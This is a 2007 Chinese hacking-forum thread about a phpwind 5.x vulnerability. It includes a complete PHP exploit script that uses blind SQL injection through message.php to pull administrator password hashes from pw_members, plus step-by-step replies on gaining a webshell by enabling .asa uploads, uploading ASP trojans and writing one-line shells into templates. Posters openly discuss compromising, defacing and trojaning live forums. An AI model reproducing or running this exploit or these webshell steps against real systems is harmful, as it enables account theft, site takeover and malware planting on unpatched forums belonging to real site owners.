[讨论]phpwind 5.xx exp(gui)
议题作者:lvhuana信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
朋友让代发的,声明不是原创,为了更多人研究,发在这里。
for more:
[url]http://www.baidu.com/s?tn=baidu&wd=powered+by+PHPWind+v5.0&ct=0[/url]
[url]http://www.google.com/search?newwindow=1&q=powered+by+phpwind+v5.0[/url] PH太不负责了,今天才发补丁。国内的PW论坛已经死尸遍野了! 呵呵 在NEEAO BLOG里看到了 百度和狗狗前几页里很多PHPWIND的论坛的CSS都被人搞残了,希望再有想测试的兄弟想想站长的心情 :) 。 PHPWIND已经发出公告了,测试一个站的时候在后台看到有安全更新提示了 [s:289] [s:289] [s:289] 就是拿不到PW的webshell
请牛人指点一二 PW的shell
得到管理员帐号
进入后台
用一句话写入可写的页面.
比如模板那里.
然后链接上传大马...!
这个漏洞是?孤陋寡闻,用工具建立了用户,也新会员,不知道怎么利用~ 进入后台,在所有设置那里找到允许上传的文件的后缀添加asa。然后进入前台随便找一个版块发个贴,把你的ASP马的后缀改成asa的然后上传。然后再到后台的附件管理,点击统计附件找到刚才上传的附件,双击下就可以了。只在WINDOWS主机测试通过,LINUX的测试不通过。另外就是在前台直接传过PHP马 但是我没试。只是用ASP马得到shell再拿的PHPshell! 这里有一段Loveshell写的PHP溢出脚本,是不是可以显示密码的说?
有错误的,哪位给修改一下嘎
print_r("
+----------------------------- -------------------------------------+
Exploit For Phpwind 5.X Version
BY Loveshell
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F
%09.72m.net;
1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;
1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;
echo "\r\n#Logging\t........";
if(islogin()) echo "Login Ok!\r\n";
else die("Not Login!\tCheck Your Cookie and Useragent!\r\n");
echo "#Testing\t........";
if(test()) echo "Vul!\r\n";
else die("Not Vul");
$hashtable='0123456789abcdef';
$count=0;
echo "#Cracking\t\r\n\r\n";
for($i=1;$i<=16;$i++){
echo "第\t$i\t位:";
$subpass=crack($i+8);
$password=$password.$subpass;
echo "$subpass\r\n";
}
echo "Password:\t$password";
echo "\r\nGood Luck $count Times\r\n";
function send($cmd,$path)
{
global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$bbspath."$path";
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
$count=$count+1;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
function sqlject($sql){
global $uid;
$data='action=pubmsg&readmsg=0)';
$data=$data." union select BENCHMARK(1000000,md5(12345)) from
pw_members where uid=$uid and $sql".'/*';
$echo=send($data,'message.php');
preg_match("/Total (.*)\(/i",$echo,$matches);
if($matches[1]>2) return 1;
else return 0;
}
function test(){
global $uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'MySQL Server Error')) return 1;
else return 0;
}
function islogin(){
global $uid;
$data='action=pubmsg&readmsg=0)';
$echo=send($data,'message.php');
if(strpos($echo,'login.php"')) return 0;
else return 1;
}
function crack($i){
global $hashtable;
$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
$a=8;
$b=15;}
else {
$a=0;
$b=8;
}
for($tmp=$a;$tmp<=$b;$tmp++){
$sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?> [s:289] [s:289] ..楼上.显密码`?....利用的EXE不是出来了吗~ 现在进了就是不知如何拿shell了!! [quote]引用第2楼donker于2007-04-07 01:06发表的 :
呵呵 在NEEAO BLOG里看到了 百度和狗狗前几页里很多PHPWIND的论坛的CSS都被人搞残了,希望再有想测试的兄弟想想站长的心情 :) 。 PHPWIND已经发出公告了,测试一个站的时候在后台看到有安全更新提示了[/quote]
[s:270]这位兄弟说的好.昨天我也去测试拉下但是真的漏洞是100%可以的.
哎是做网站不容易挖..那些所谓的人为拉钱.熏心利欲.哎没办法说..! 测试了几个5.3,没有成功~~~~
不过这个漏洞的确算大的够可以了。。。
可怜的站长们~ 可以注册一些被关闭注册的论坛。不知道有什么好的论坛可以推荐一下 呵呵。。CSS里到处都是马。。大家赶快去清除呀。。。 [s:289] 今天真是关站的一大片啊.. 试了几种方法。最终没能拿到WEBSHELL
那位高人能指点下呢 [s:269] [quote]引用第8楼ljwd9于2007-04-07 07:52发表的 :
[s:289] [s:289] ..楼上.显密码`?....利用的EXE不是出来了吗~[/quote]
直接改密码不好啊,要是能弄到密码就隐蔽多了,不过那个代码好像也只能该密码,因为是最早出的一个,后来放出老外的利用工具 挂马代码是什么啊 我不会挂啊 呵呵...不错呀...漏洞站很多呀。。。。。 只能拿到前站管理员的.. [quote]引用第6楼小暴于2007-04-07 05:49发表的 :
郁闷,搞不到webshell ,网上流传的三种方法似乎不行了,那位有好的办法拿? [s:269]
[/quote]
嗯
试了一个遍 好像没一个管用的
小弟愚昧 还望大侠指教一二[s:263] 漏洞原理是什么~~??? [s:268] 不知道乍样拿shell 进了后台也没激情。网上那几种拿shell的方法全试了,没一个能OK的! 测试了一个网站
上传上了asp马,但是上传后文件后缀被改了
不能运行啊
不知该怎样 呵呵。。进可以后台可以拿WEBSHELL的。。。大家多测试了。。方法很多。也很简单。。不过现在90%被黑了。。呵呵。原理自己抓个包就知道了。CRACK密码那是一个文件。直接改密码又是一个洞。一个文件。。。还有个最猛的是直接写个SHELL。。目前工具未公布。。漏洞文件关联了好几个。。JOB。PHP。。等。继续研究最后那个漏洞。。。 具体原理到底是什么,麻烦哪位大虾讲讲啊~~~~
p.s.前天下午邪八无法访问,难道也是因为这个漏洞么??????
页:
[1]